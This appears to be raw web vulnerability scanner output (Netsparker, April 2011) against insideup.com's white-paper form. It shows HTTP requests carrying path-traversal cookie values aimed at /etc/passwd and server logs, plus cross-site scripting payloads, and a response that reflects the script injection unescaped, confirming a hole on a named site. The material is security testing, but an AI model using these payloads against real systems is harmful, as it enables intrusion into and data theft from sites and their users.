OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011A1)%3c%2fscript%3e&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DF1B49732D4CD1C2C6A011DEFDA70E59; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="'"--></style></script><script>netsparker(0x0011A1)</script>"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> ..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter        Type   Value
company          POST   3
companyServices  POST   3
email            POST   netsparker@example.com
firstName        POST   Smith
lastName         POST   Smith
parentPage       POST   '"--></style></script><script>alert(0x0011AF)</script>
phone            POST   3
src              POST   teledirectcasestudy
Submit           POST   3
url              POST   3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011AF)%3c%2fscript%3e&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:36 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=43AACFE9AC0B13771A3F8892F16E92E5; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
